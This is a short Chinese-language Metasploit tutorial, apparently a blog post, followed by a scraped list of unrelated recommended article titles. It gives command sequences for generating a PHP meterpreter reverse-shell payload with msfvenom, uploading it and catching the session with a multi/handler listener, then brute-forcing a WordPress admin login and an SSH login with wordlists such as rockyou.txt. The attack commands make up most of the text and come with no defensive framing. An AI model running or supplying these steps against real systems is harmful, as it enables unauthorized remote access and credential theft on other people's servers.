1,制作一个反弹shell,来执行服务的命令,并监听

(能在浏览器上直接访问的就制作php的,可以使用命令执行的建议使用 python型的)

(制作python型的只需要把php改为python就可以了)

msfvenom  -p php/meterpreter/reverse_tcp lhost=192.168.11.166 lport=4444 -f raw

-p 指定使用模块 -f raw  显示源代码

使用msfconsole监听

msfconsole
use exploit/multi/handler                     //使用 这个攻击模块
set payload php/meterpreter/reverse_tcp      //设置payload
show options
set lhost 192.168.11.165
run

然后上传并执行 反弹shell代码

在监听端就会显示相应内容

2,暴力破解wordpress的password

msfconsole
use auxiliary/scanner/http/wordpress_login_enum
show options
set username admin
set pass_file /usr/share/wordlists/dirb/comment.txt
set targeturl /secret/
set rhost 192.168.11.170
run

其中如果不知道 username 可以用 wpscan 先进行暴力破解 username

3,暴力破解ssh的登录密码

msfconsole
use auxiliary/scanner/ssh/ssh_login
show options
set rhosts 192.168.1.106set username hadiset pass_file /usr/share/wordlists/rockyou.txt    //设置字典set thread 10show optionsrun

metasploit framework相关推荐

  1. Metasploit Framework(MSF)的使用

    目录 Metasploit Metasploit的安装和升级 MSF中加载自定义的exploit模块 漏洞利用(exploit) 攻击载荷(payload) Meterpreter MS17_010( ...

  2. Metasploit Framework 简介与使用

    Metasploit Framework是一个编写,测试和使用exploit代码的完善环境.这个环境为渗透测试,shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Perl ...

  3. Metasploit Framework(1)基本命令、简单使用

    文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 基本的控制台命令介绍: banner 查看metasp ...

  4. metasploit下载教程linux,在Debian 10/9系统上安装Metasploit Framework的方法

    本文介绍在Debian 10/9操作系统上安装Metasploit Framework的方法,以脚本的方式安装,全程相当的简单,按照以下步骤操作即可. 在Debian 10/Debian 9上安装Me ...

  5. Metasploit Framework(6)客户端渗透(上)

    文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 前五篇文章讲解了Metasploit Framewor ...

  6. windows上安装Metasploit Framework 4.0

    今天在给朋友的windows上安装Metasploit Framework 4.0的时候出现以下错误: Error running C:\Program Files\Rapid7\framework/ ...

  7. Metasploit Framework Handbook

    文章目录 前言 MsFramework Metasploit 诞生发展 体系结构 功能阶段 工具管理 基本命令 情报搜集 网络服务渗透测试 Refference 前言 众所周知Metasploit工具 ...

  8. Metasploit Framework(MSF)基础框架

    Metasploit简介 Metasploit框架(Metasploit Framework,MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗 ...

  9. Metasploit Framework下的Exploit应用开发中文手册

    为了方便大家手记,以下内容有PDF转化而来,如果不方便阅读或遇错,请下载PDF版本阅读! 作者:gz1x [gz1x@tom.com]                   [目录]   目录----- ...

  10. 【无标题】Metasploit Framework(更新中······)

    MSF 默认集成于Kali Linux 之中 使用postgresql数据库存储数据 – 早期版本需要先启动数据库再启动msf MSF架构 MSF架构 Rex – 基本功能库,用于完成日常基本任务,无 ...

最新文章

  1. springmvc接收前台(可以是ajax)传来的数组list,map,set等集合,复杂对象集合等图文详解...
  2. sed和awk中使用shell变量
  3. UUID介绍与生成方法
  4. 表弟:这数学规律题该怎么解决呢?使用Python你会发现很简单
  5. 微信新功能又来了,这些功能再次打开了我新世界的大门!
  6. [密码学基础][每个信息安全博士生应该知道的52件事][Bristol Cryptography][第25篇]使用特殊的素数定义GF(p)和GF(2^n)的方法
  7. python app开发模块_Python pytkapp包_程序模块 - PyPI - Python中文网
  8. Java基础知识编写一个HelloWorld案例
  9. Java 线程 fork join 是什么 怎么用
  10. 将DynamipsGUI和VMware虚拟机进行桥接
  11. NYOJ题目71-独木舟上的旅行(贪心)
  12. c语言计算10亿位圆周率,C语言:圆周率的计算
  13. 精读CSS权威指南第四版(1)
  14. 无网络状态下显卡驱动软件安装
  15. 服务器信息批量收集,如何批量导入或导出服务器信息
  16. 泡泡龙游戏的完整制作流程
  17. 计算机的空间复用技术应用,MIMO技术的介绍
  18. 电池充放电1c指的是什么
  19. 手机怎么把图片制作成短视频,原来还有这种傻瓜式的操作,长知识了
  20. 音视频编解码基础知识(1)- 音视频编解码过程

热门文章

  1. python notebook使用,Jupyter Notebook使用笔记
  2. python verilog顶层连线,如何在Verilog中连接两个模块?
  3. android 获取手机SD卡和手机的内部存储
  4. zip: stdin: unexpected end of file tar: 归档文件中异常的 EOF tar: 归档文件中异常的 EOF tar: Error is not recoverable
  5. 直播 | 清华大学李一鸣:后门攻击简介
  6. 殊途同归的策略梯度与零阶优化
  7. ICLR 2020 | 多模态下使用图片信息显著增强机器翻译效果
  8. CVPR 2020 | ActBERT: 自监督多模态视频文字学习
  9. 机器学习常见知识点自查50问与答
  10. include_fns.php_管理页面